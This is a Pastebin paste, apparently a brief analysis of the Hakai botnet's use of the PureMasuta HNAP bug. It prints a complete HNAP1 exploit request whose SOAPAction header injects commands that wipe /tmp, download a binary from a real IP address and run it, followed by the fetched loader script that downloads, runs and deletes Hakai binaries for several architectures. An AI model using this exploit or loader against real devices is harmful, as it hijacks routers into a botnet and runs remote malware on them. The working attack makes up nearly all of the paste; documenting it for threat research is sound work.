Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hakai botnet now loaded with PureMasuta bug.
- POST /HNAP1/ HTTP/1.0
- Content-Type: text/xml; charset="utf-8"
- SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://50.115.166.136/bin && sh /tmp/bin`
- Content-Length: 640
- <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
- Let us see see what http://50.115.166.136/bin is hosting.
- Its HAKAI !
- #!/bin/sh
- n="hakai.mips hakai.mpsl ea4 ea7 hakai.x86_64"
- http_server="50.115.166.136"
- for a in $n
- do
- busybox wget http://$http_server/$a -O -> /tmp/$a
- busybox chmod 777 /tmp/$a
- /tmp/$a
- done
- for a in $n
- do
- rm -rf /tmp/$a
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement